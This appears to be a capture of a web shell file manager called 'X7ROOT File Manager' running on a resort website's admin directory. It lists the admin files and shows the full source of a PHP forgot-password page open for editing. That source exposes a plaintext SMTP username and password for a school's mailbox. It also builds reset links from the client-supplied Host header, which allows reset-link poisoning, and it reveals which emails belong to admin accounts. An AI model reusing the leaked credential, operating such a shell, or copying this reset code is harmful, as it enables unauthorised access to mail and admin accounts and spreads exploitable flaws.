X7ROOT File Manager
Current Path:
/home/u126090504/domains/oceanicabeachresort.com/public_html/admin
home
/
u126090504
/
domains
/
oceanicabeachresort.com
/
public_html
/
admin
/
📁
..
📁
assets
📄
banners.php
(9.78 KB)
📄
booking-dashboard.php
(4.93 KB)
📄
booking_status_update.php
(6.14 KB)
📄
booking_view.php
(4.04 KB)
📄
branding_settings.php
(5.93 KB)
📄
change_password.php
(3.01 KB)
📄
contacts.php
(3.83 KB)
📄
dashboard.php
(5.64 KB)
📁
dompdf
📄
downloads.php
(4.91 KB)
📄
forgot_password.php
(5.76 KB)
📄
gallery.php
(3.08 KB)
📁
img
📁
includes
📄
index.php
(82 B)
📁
invoices
📄
login.php
(13.47 KB)
📄
logo.png
(19.29 KB)
📄
logout.php
(102 B)
📄
manage_albums.php
(10.82 KB)
📄
manage_media.php
(11.77 KB)
📄
manage_photos.php
(6.35 KB)
📄
manage_videos.php
(18.38 KB)
📄
new_password.php
(3.9 KB)
📄
notice.php
(15.52 KB)
📄
notice_error.log
(38.45 KB)
📄
notices.php
(8.24 KB)
📄
payments.php
(14.96 KB)
📄
pdf_bill_template.php
(30.69 KB)
📁
phpmailer
📄
popup.php
(14.07 KB)
📄
reset_password.php
(2.27 KB)
📄
secure_session.php
(1000 B)
📄
settings.php
(8.34 KB)
📄
test.php
(239 B)
📄
test_pdf.php
(1.58 KB)
📄
testimonials.php
(15.15 KB)
📁
tmp
📄
update_status.php
(1.66 KB)
📄
upi_settings.php
(1.52 KB)
Editing: forgot_password.php
<?php // forgot_password.php — public but safe error_reporting(E_ALL); ini_set('display_errors', 1); ini_set('display_startup_errors', 1); session_start(); // auth.php ke bina bhi session chahiye // Agar admin already logged in hai to dashboard bhej do if (!empty($_SESSION['admin_id'])) { header("Location: dashboard.php"); exit; } require_once __DIR__ . '/../config.php'; // must define $conn (mysqli) // ---- SMTP CONFIG (preferably move to config.php) ---- $SMTP_HOST = 'smtp.hostinger.com'; $SMTP_USER = 'no-reply@xavierinternationalschool.org'; // your mailbox $SMTP_PASS = '9861845796Aa@#'; // your mailbox password $SMTP_PORT = 587; $FROM_EMAIL = 'no-reply@xavierinternationalschool.org'; $FROM_NAME = 'Xavier International School'; $REPLY_TO = 'support@xavierinternationalschool.org'; // Build base URL dynamically $scheme = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https' : 'http'; $host = $_SERVER['HTTP_HOST'] ?? 'localhost'; $baseURL = $scheme . '://' . $host; // ---- PHPMailer detection ---- $autoload = __DIR__ . '/../vendor/autoload.php'; if (file_exists($autoload)) { require_once $autoload; } else { $try1 = __DIR__ . '/PHPMailer/src'; $try2 = __DIR__ . '/phpmailer/src'; if (is_dir($try1) && file_exists($try1.'/PHPMailer.php')) { require_once $try1 . '/PHPMailer.php'; require_once $try1 . '/SMTP.php'; require_once $try1 . '/Exception.php'; } elseif (is_dir($try2) && file_exists($try2.'/PHPMailer.php')) { require_once $try2 . '/PHPMailer.php'; require_once $try2 . '/SMTP.php'; require_once $try2 . '/Exception.php'; } else { die("<pre>PHPMailer not found. Upload library to /admin/PHPMailer/src/</pre>"); } } use PHPMailer\PHPMailer\PHPMailer; use PHPMailer\PHPMailer\Exception; $flash = ''; if ($_SERVER['REQUEST_METHOD'] === 'POST') { $email = trim($_POST['email'] ?? ''); if (!filter_var($email, FILTER_VALIDATE_EMAIL)) { $flash = "<div class='alert alert-danger mb-3'>❌ Invalid email address.</div>"; } else { $stmt = $conn->prepare("SELECT id, username FROM register WHERE email=? AND usertype='admin' LIMIT 1"); $stmt->bind_param("s", $email); $stmt->execute(); $stmt->bind_result($uid, $username); $found = $stmt->fetch(); $stmt->close(); if (!$found) { $flash = "<div class='alert alert-danger mb-3'>❌ This email is not registered as admin.</div>"; } else { $token = bin2hex(random_bytes(32)); $expires = date("Y-m-d H:i:s", time() + 3600); // 1 hour $stmt = $conn->prepare("UPDATE register SET reset_token=?, reset_expires=? WHERE id=?"); $stmt->bind_param("ssi", $token, $expires, $uid); $stmt->execute(); $stmt->close(); $reset_link = $baseURL . "/admin/reset_password.php?token=" . urlencode($token); $mail = new PHPMailer(true); try { $mail->isSMTP(); $mail->Host = $SMTP_HOST; $mail->SMTPAuth = true; $mail->Username = $SMTP_USER; $mail->Password = $SMTP_PASS; $mail->SMTPSecure = PHPMailer::ENCRYPTION_STARTTLS; $mail->Port = $SMTP_PORT; $mail->setFrom($FROM_EMAIL, $FROM_NAME); $mail->addAddress($email, $username ?: 'Admin'); if (!empty($REPLY_TO)) $mail->addReplyTo($REPLY_TO, 'Support'); $mail->isHTML(true); $safeUser = htmlspecialchars($username ?: 'Admin', ENT_QUOTES, 'UTF-8'); $mail->Subject = 'Password Reset Request'; $mail->Body = " <p>Hello <b>{$safeUser}</b>,</p> <p>Click the link below to reset your password (valid for <b>1 hour</b>):</p> <p><a href='{$reset_link}' target='_blank'>{$reset_link}</a></p> <p>If you didn’t request this, you can safely ignore this email.</p> <br><p>Regards,<br>{$FROM_NAME}</p> "; $mail->AltBody = "Reset your password (valid 1 hour): {$reset_link}"; $mail->send(); $flash = "<div class='alert alert-success mb-3'>✅ Reset link sent. Please check your email (Inbox/Spam).</div>"; } catch (Exception $e) { error_log('Mail error: ' . $mail->ErrorInfo); $flash = "<div class='alert alert-danger mb-3'>❌ Email send failed. Please try again later.</div>"; } } } } ?> <!doctype html> <html lang="en"> <head> <meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1"> <title>Forgot Password</title> <link href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/css/bootstrap.min.css" rel="stylesheet"> <style>body{background:#f8f9fa}.card{border-radius:12px}</style> </head> <body class="bg-light"> <div class="container py-5"> <div class="col-md-5 mx-auto"> <div class="card shadow"> <div class="card-body"> <h3 class="text-center mb-3">Forgot Password</h3> <?php if(!empty($flash)) echo $flash; ?> <form method="POST" autocomplete="off" novalidate> <div class="form-group"> <label>Enter your registered admin email</label> <input type="email" name="email" class="form-control" required> </div> <button type="submit" class="btn btn-primary btn-block">Send Reset Link</button> </form> <p class="mt-3 text-center"><a href="login.php">Back to Login</a></p> </div> </div> </div> </div> </body> </html>
Upload File
Create Folder
